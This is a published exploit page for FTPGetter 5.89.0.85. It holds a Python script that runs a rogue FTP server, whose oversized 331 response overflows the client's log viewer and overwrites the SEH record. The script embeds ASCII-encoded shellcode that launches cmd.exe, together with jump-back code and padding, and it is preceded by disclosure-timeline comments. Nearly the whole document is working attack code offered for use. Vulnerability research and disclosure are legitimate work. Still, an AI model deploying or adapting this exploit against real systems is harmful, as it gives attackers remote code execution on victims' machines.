
FTPGetter 5.89.0.85 Buffer Overflow

Posted on 19 July 2017

#!/usr/bin/python
# Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow
# Date: 07/14/2017
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: https://www.ftpgetter.com/
# Vulnerable Version Download: Available for 30 days here: (https://ufile.io/2celn) I can upload again upon request
# Version: FTPGetter 5.89.0.85 (also works on earlier versions)
# Tested on: Windows 10 Pro 1703 x64
# Youtube Demonstration of Exploit: https://www.youtube.com/watch?v=AuAiQwGP-ww
# Category: Remote Code Execution
#
# Timeline: 05/25/16 Bug found
# 05/31/16 Vendor notified - no response
# 07/15/16 Vendor notified - no response
# -------- Vendor notified multiple times over a year, no response.
# 07/14/17 Exploit Published
#
# Summary: There is a buffer overflow in the log viewer/parser of FTPGetter. When a malicious FTP server returns a long
# 331 response, the overflow overwrites the SEH record and is exploitable. There are many bad characters, so I had to ASCII-encode everything.
# My PoC runs code to launch a command shell. Also note that the time of day is displayed in the log viewer, which will
# change the length of the buffer needed. Just adjust your sled accordingly.
from socket import * #ascii encoded launch cmd.exe buf = "" buf += "x57x59x49x49x49x49x49x49x49x49x49x49x49" buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" buf += "x4bx4cx6bx58x4fx72x67x70x43x30x55x50x33" buf += "x50x4fx79x4ax45x44x71x4fx30x71x74x6cx4b" buf += "x70x50x34x70x4ex6bx61x42x54x4cx4cx4bx42" buf += "x72x47x64x4ex6bx64x32x44x68x36x6fx4cx77" buf += "x42x6ax46x46x30x31x4bx4fx4cx6cx57x4cx31" buf += "x71x63x4cx44x42x64x6cx35x70x7ax61x38x4f" buf += "x56x6dx55x51x6fx37x38x62x4cx32x61x42x52" buf += "x77x4cx4bx51x42x32x30x6ex6bx50x4ax77x4c" buf += "x4ex6bx42x6cx34x51x44x38x68x63x32x68x66" buf += "x61x58x51x62x71x6cx4bx76x39x35x70x35x51" buf += "x49x43x4ex6bx37x39x67x68x68x63x55x6ax72" buf += "x69x4cx4bx64x74x4ex6bx65x51x5ax76x35x61" buf += "x69x6fx4cx6cx6bx71x78x4fx54x4dx57x71x39" buf += "x57x46x58x79x70x51x65x4cx36x67x73x51x6d" buf += "x38x78x67x4bx73x4dx64x64x32x55x39x74x56" buf += "x38x4cx4bx62x78x54x64x37x71x79x43x75x36" buf += "x4ex6bx46x6cx42x6bx4ex6bx56x38x47x6cx46" buf += "x61x5ax73x6cx4bx45x54x4cx4bx33x31x48x50" buf += "x4cx49x73x74x44x64x44x64x33x6bx53x6bx50" buf += "x61x73x69x63x6ax62x71x59x6fx6bx50x53x6f" buf += "x51x4fx32x7ax4ex6bx72x32x7ax4bx4ex6dx31" buf += "x4dx52x4ax35x51x4cx4dx4cx45x38x32x67x70" buf += "x63x30x53x30x66x30x75x38x36x51x6ex6bx52" buf += "x4fx4fx77x39x6fx4bx65x4dx6bx6ax50x4fx45" buf += "x4fx52x30x56x42x48x6ex46x6fx65x6fx4dx6d" buf += "x4dx49x6fx7ax75x45x6cx73x36x51x6cx37x7a" buf += "x4bx30x39x6bx39x70x30x75x76x65x6dx6bx72" buf += "x67x32x33x52x52x62x4fx51x7ax75x50x76x33" buf += "x79x6fx4bx65x55x33x62x4dx72x44x34x6ex53" buf += "x55x43x48x61x75x57x70x41x41" #All the normal ways to jump back to code I control code were bad characters, so again had to ascii encode jmpback = "" jmpback += "x56x59x49x49x49x49x49x49x49x49x49x49x49" jmpback += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" jmpback += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" 
jmpback += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" jmpback += "x4ex6dx4dx6ex46x70x49x6ex6bx4fx4bx4fx49" jmpback += "x6fx6ax47x41x41" host = "0.0.0.0" port = 21 sled="NjoyUrShell!" fill="x41"*(480-len(buf)) nseh="x74x06x90x90" seh="xadx11x4dx00" prepesi="x58x58x58x8dx70x10x90x90" jnk="B"*400 sploit=(sled+buf+fill+nseh+seh+prepesi+jmpback+jnk) sock = socket(AF_INET, SOCK_STREAM) sock.bind((host, 21)) sock.listen(1) print "Anti-FtpGetter FTP Server Started!" print "Ready to pwn on port %d..." % port connect, hostip = sock.accept() print "Connection accepted from %s" % hostip[0] connect.send("220 Welcome to pwnServ, Serving sploit in 3..2..1.. ") connect.recv(64) # Receive USER print "Sending EViL 331 response" connect.send("331 "+sploit+" ") print "Here, have a handy dandy command shell!" connect.close() sock.close()

 
